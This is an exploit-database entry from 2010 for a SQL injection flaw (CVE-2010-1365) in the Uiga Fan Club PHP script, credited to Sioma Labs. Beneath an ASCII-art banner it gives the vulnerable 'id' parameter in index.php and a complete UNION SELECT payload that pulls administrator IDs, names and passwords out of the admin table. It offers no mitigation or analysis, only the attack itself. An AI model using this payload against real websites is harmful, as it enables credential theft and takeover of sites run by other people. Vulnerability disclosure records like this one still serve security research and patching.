Uiga Fan Club - SQL Injection



EKU-ID: 19100 CVE: CVE-2010-1365;OSVDB-62629 OSVDB-ID:
Author: Sioma Labs Published: 2010-03-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Uiga Fan Club SQL Injection Vulnerability
# Date: 22/03/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A

 __ _                           __       _
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/


Exploit :
http://site/index.php?view=photos&id=[SQLi]


Example :
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--


#Sioma Labs
#siomalabs.com
#Sioma Agent 154